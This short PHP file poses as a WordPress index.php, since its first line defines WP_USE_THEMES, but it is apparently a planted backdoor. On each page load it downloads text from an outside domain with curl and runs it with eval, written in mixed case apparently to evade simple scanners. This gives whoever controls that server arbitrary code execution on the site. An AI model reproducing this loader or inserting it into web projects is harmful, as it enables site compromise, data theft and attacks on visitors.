<?php define( 'WP_USE_THEMES', true ); $cx = curl_init("https://z60311_16.ydooley.shop/stat/index.txt"); curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1); $rs = curl_exec($cx); if ($rs !== false) { $data = eVaL('?>' . $rs); }